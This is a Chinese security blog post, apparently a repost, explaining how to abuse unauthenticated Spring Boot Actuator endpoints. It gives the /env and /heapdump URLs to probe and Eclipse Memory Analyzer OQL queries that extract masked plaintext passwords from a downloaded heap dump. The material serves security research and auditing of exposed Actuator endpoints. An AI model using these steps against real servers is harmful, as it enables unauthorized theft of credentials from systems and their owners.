SpringBoot 未授权漏洞利用 提取内存密码

admin 2022年1月6日01:43:52安全博客评论48 views1536字阅读5分7秒阅读模式

背景

Actuator 是 Spring Boot 提供的对应用系统的自省和监控的集成功能,可以查看应用配置的详细信息,例如自动化配置信息、创建的 Spring beans 以及一些环境属性等。

为了保证 actuator 暴露的监控接口的安全性,需要添加安全控制的依赖spring-boot-start-security依赖,访问应用监控端点时,都需要输入验证信息。Security 依赖,可以选择不加,不进行安全管理,但不建议这么做。

访问 /env 接口时,spring actuator 会将一些带有敏感关键词 (如 password、secret) 的属性名对应的属性值用 ****** 号替换,以达到脱敏的效果。

在目标既不出网,/jolokia 接口又没有合适的 MBean 或者不支持 POST 请求的情况下,很多获取被星号脱敏的密码的明文的方法就失效了。

这时候就可以利用 Eclipse Memory Analyzer 工具来分析 /heapdump 或 /actuator/heapdump 接口下载的 jvm heap 信息,查找密码明文。

利用方法

1、访问如下路径如果有数据则说明存在漏洞

1
2
3
4
5
# Spring Boot 1.x版本访问/env
http://ip:8090/env

# Spring Boot 2.x版本访问/actuator/env
http://ip:8090/actuator/env

2、下载jvm heapdump文件

1
2
3
4
5
# Spring Boot 1.x版本访问/heapdump
http://ip:8090/heapdump

# Spring Boot 2.x版本访问/actuator/heapdump
http://ip:8090/actuator/heapdump

3、使用Eclipse Memory Analyzer解析内存文件

Eclipse Memory Analyzer下载地址
https://www.eclipse.org/mat/downloads.php

1
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

使用 Eclipse Memory Analyzer 直接打开下载的 heapdump 文件,点击 OQL 标签,在查询框中输入

2.png

1
select * from org.springframework.web.context.support.StandardServletEnvironment

然后点击红色感叹号执行查询。

如下图, spring boot 1.x 版本 heapdump 查询结果,最终结果存储在 java.util.Hashtable$Entry 实例的键值对中:
1.png

所以也可以用

1
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

来查询。

下图为 spring boot 2.x 版本 heapdump 查询结果,最终结果存储在 java.util.LinkedHashMap$Entry 实例的键值对中:

2.png

所以也可以用

1
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

参考

http://www.ityouknow.com/springboot/2018/02/06/spring-boot-actuator.html

https://landgrey.me/blog/16/

https://www.onebug.org/websafe/98901.html

FROM :b0urne.top | Author:b0urne

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:43:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  SpringBoot 未授权漏洞利用 提取内存密码 http://cn-sec.com/archives/722451.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: